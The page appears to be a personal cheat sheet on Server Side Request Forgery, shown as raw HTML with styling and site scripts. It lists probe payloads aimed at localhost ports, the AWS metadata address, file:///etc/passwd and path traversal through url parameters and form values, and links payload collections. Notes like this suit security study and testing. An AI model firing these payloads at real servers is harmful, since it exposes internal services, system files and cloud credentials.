|
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
|
|
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
|
|
.codehilite .go { color: #546E7A } /* Generic.Output */
|
|
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
|
|
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
|
|
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
|
|
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
|
|
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
|
|
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
|
|
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
|
|
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
|
|
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
|
|
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
|
|
.codehilite .ld { color: #C3E88D } /* Literal.Date */
|
|
.codehilite .m { color: #F78C6C } /* Literal.Number */
|
|
.codehilite .s { color: #C3E88D } /* Literal.String */
|
|
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
|
|
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
|
|
.codehilite .nc { color: #FFCB6B } /* Name.Class */
|
|
.codehilite .no { color: #EEFFFF } /* Name.Constant */
|
|
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
|
|
.codehilite .ni { color: #89DDFF } /* Name.Entity */
|
|
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
|
|
.codehilite .nf { color: #82AAFF } /* Name.Function */
|
|
.codehilite .nl { color: #82AAFF } /* Name.Label */
|
|
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
|
|
.codehilite .nx { color: #EEFFFF } /* Name.Other */
|
|
.codehilite .py { color: #FFCB6B } /* Name.Property */
|
|
.codehilite .nt { color: #FF5370 } /* Name.Tag */
|
|
.codehilite .nv { color: #89DDFF } /* Name.Variable */
|
|
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
|
|
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
|
|
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
|
|
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
|
|
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
|
|
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
|
|
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
|
|
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
|
|
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
|
|
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
|
|
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
|
|
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
|
|
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
|
|
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
|
|
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
|
|
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
|
|
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
|
|
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
|
|
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
|
|
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
|
|
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
|
|
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
|
|
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
|
|
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
|
|
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
|
|
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
|
|
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
|
|
<div class="column column-3">
|
|
<ul>
|
|
<li><a href="#server-side-request-forgery-ssrf">Server Side Request Forgery (SSRF)</a><ul>
|
|
<li><a href="#usage">Usage</a><ul>
|
|
<li><a href="#sanity-test-service">Sanity Test Service</a></li>
|
|
<li><a href="#reading-files">Reading files</a></li>
|
|
<li><a href="#request-forgery-through-get-parameters">Request Forgery through GET parameters</a></li>
|
|
<li><a href="#html-form">HTML Form</a></li>
|
|
</ul>
|
|
</li>
|
|
<li><a href="#tricks">Tricks</a></li>
|
|
<li><a href="#tools">Tools</a></li>
|
|
</ul>
|
|
</li>
|
|
</ul>
|
|
</div>
|
|
<h1 id="server-side-request-forgery-ssrf">Server Side Request Forgery (SSRF)</h1>
|
|
<p>is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls. The attack can either be blind or data is returned to the attacker dire tly.</p>
|
|
<h2 id="usage">Usage</h2>
|
|
<h3 id="sanity-test-service">Sanity Test Service</h3>
|
|
<p>Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports.</p>
|
|
<div class="codehilite"><pre><span></span><code>http://127.0.0.1:3306
|
|
http://localhost:5432
|
|
http://0.0.0.0:53
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>IPv6</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>http://[::]:3306
|
|
http://:::3006
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>Cloud info in Link Local IP range <code>169.254.0.0/16</code></li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code><span class="mf">169.254.169.254</span><span class="w"> </span><span class="o">--></span><span class="w"> </span><span class="n">AWS</span><span class="w"> </span><span class="n">info</span><span class="w"></span>
|
|
<span class="mf">169.254.169.253</span><span class="w"> </span><span class="o">--></span><span class="w"> </span><span class="n">DNS</span><span class="w"> </span><span class="n">AWS</span><span class="w"> </span><span class="n">VPC</span><span class="w"></span>
|
|
<span class="mf">169.254.169.123</span><span class="w"> </span><span class="o">--></span><span class="w"> </span><span class="n">Stratum</span><span class="w"> </span><span class="mf">3</span><span class="w"> </span><span class="n">NTP</span><span class="w"></span>
|
|
<span class="mf">127.0.0.1</span><span class="p">:</span><span class="mf">53</span><span class="w"> </span><span class="o">--></span><span class="w"> </span><span class="kr">sys</span><span class="n">temd</span><span class="w"> </span><span class="n">DNS</span><span class="w"></span>
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li><a href="https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72">Changing input format into hex or encoded</a></li>
|
|
</ul>
|
|
<h3 id="reading-files">Reading files</h3>
|
|
<div class="codehilite"><pre><span></span><code>file:///etc/passwd
|
|
</code></pre></div>
|
|
|
|
<h3 id="request-forgery-through-get-parameters">Request Forgery through GET parameters</h3>
|
|
<ul>
|
|
<li>Request app server through parameter </li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>http://<ssrf-Server>/?url<span class="o">=</span>http://<AppServer>/secret/url
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>Request remote resources, or path traversal on remote resource</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>http://<ssrf-Server>/?url<span class="o">=</span>/item?id<span class="o">=</span><span class="m">42</span>
|
|
http://<ssrf-Server>/?url<span class="o">=</span>../../etc/passwd
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>Request subdomain URL and cut following unnecessary parameters through <code>&x=&id=42</code>. Parameter <code>x</code> does not exist. So, it will be ignored</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>http://<ssrf-Server>/?url<span class="o">=</span>db.test.com/shop/item?secret<span class="o">=</span>key<span class="p">&</span><span class="nv">x</span><span class="o">=</span><span class="p">&</span><span class="nv">id</span><span class="o">=</span><span class="m">42</span>
|
|
</code></pre></div>
|
|
|
|
<h3 id="html-form">HTML Form</h3>
|
|
<p>User input through POST form on websites may open files (other MIME types) from server resources. Updating the path reference may yield unintended file content.</p>
|
|
<div class="codehilite"><pre><span></span><code><span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"radio"</span> <span class="na">name</span><span class="o">=</span><span class="s">"avatar"</span> <span class="na">value</span><span class="o">=</span><span class="s">"assets/avatars/6.png"</span><span class="p">></span>
|
|
</code></pre></div>
|
|
|
|
<p>This may be used for path traversal</p>
|
|
<div class="codehilite"><pre><span></span><code><span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"radio"</span> <span class="na">name</span><span class="o">=</span><span class="s">"avatar"</span> <span class="na">value</span><span class="o">=</span><span class="s">"x/../private"</span><span class="p">></span>
|
|
</code></pre></div>
|
|
|
|
<p>Check return value of the form for result.</p>
|
|
<h2 id="tricks">Tricks</h2>
|
|
<ul>
|
|
<li><code>localtest.me</code> resolves to <code>127.0.0.1</code>, may be used to extend a domain inside a parameter to redirect to localhost.</li>
|
|
</ul>
|
|
<h2 id="tools">Tools</h2>
|
|
<ul>
|
|
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file">Payload All The Things</a></li>
|
|
<li>https://requestbin.com</li>
|
|
</ul>
|
|
</span>
|
|
</div>
|
|
</div>
|
|
<div id="footer">
|
|
|
|
<p></p>
|
|
<center>
|
|
© Stefan Friese
|
|
</center>
|
|
|
|
</div>
|
|
|
|
<script>
|
|
function linkClick(obj) {
|
|
if (obj.open) {
|
|
console.log('open');
|
|
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
|
|
sessionStorage.removeItem(obj.id);
|
|
}
|
|
sessionStorage.setItem(obj.id,"open");
|
|
console.log(obj.id);
|
|
|
|
} else {
|
|
console.log('closed');
|
|
sessionStorage.removeItem(obj.id);
|
|
|
|
}
|
|
// if (obj.open) {
|
|
// console.log('open');
|
|
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === obj.id)) {
|
|
// sessionStorage.removeItem("opened");
|
|
// }
|
|
// sessionStorage.setItem("opened", obj.id);
|
|
// console.log(obj);
|
|
|
|
// } else {
|
|
// console.log('closed');
|
|
// sessionStorage.removeItem("opened");
|
|
//
|
|
// }
|
|
}
|
|
|
|
//if ( sessionStorage.getItem("opened")) {
|
|
// var item = sessionStorage.getItem("opened")
|
|
// document.getElementById(item)['open'] = 'open';
|
|
//}
|
|
let _keys = Object.keys(sessionStorage);
|
|
if (_keys) {
|
|
for ( let i = 0; i < _keys.length; i++ ) {
|
|
document.getElementById(_keys[i])['open'] = 'open';
|
|
}
|
|
}
|
|
|
|
|
|
|
|
// const detailsElement = document.querySelector('.details-sidebar');
|
|
// detailsElement.addEventListener('toggle', event => {
|
|
// if (event.target.open) {
|
|
// console.log('open');
|
|
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === detailsElement.id)) {
|
|
// sessionStorage.removeItem("opened");
|
|
// }
|
|
// sessionStorage.setItem("opened", detailsElement.id);
|
|
// console.log(detailsElement);
|
|
//
|
|
// } else {
|
|
// console.log('closed');
|
|
// sessionStorage.removeItem("opened");
|
|
//
|
|
// }
|
|
// });
|
|
//
|
|
// async function fetchIndexJSON() {
|
|
// const response = await fetch('/index.json');
|
|
// const index = await response.json();
|
|
// return index;
|
|
// }
|
|
// // Extract the `q` query parameter
|
|
//var queryStringRegex = /[\?&]q=([^&]+)/g;
|
|
//var matches = queryStringRegex.exec(window.location.search);
|
|
//if(matches && matches[1]) {
|
|
// var value = decodeURIComponent(matches[1].replace(/\+/g, '%20'));
|
|
//
|
|
//
|
|
// // fetchIndexJSON()
|
|
// // .then(index => { console.log(index['index']);});
|
|
// // Load the posts to search
|
|
// fetch('/index').then(function(posts) {
|
|
// // Remember to include Fuse.js before this script.
|
|
//
|
|
// var fuse = new Fuse(posts, {
|
|
// keys: ['title', 'tags', 'content'] // What we're searching
|
|
// });
|
|
//
|
|
// // Run the search
|
|
// var results = fuse.search(value);
|
|
// //console.log(results);
|
|
//
|
|
// // Generate markup for the posts, implement SearchResults however you want.
|
|
// // var $results = SearchResults(results);
|
|
//
|
|
// // Add the element to the empty <div> from before.
|
|
//// $('#searchResults').append($results);
|
|
// });
|
|
//}
|
|
</script>
|
|
|
|
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js"></script>
|
|
<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
|
|
</script>
|
|
<script type="text/x-mathjax-config">
|
|
MathJax.Hub.Config({
|
|
config: ["MMLorHTML.js"],
|
|
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
|
|
extensions: ["MathMenu.js", "MathZoom.js"]
|
|
});
|
|
</script>
|
|
</body>
|
|
</html> |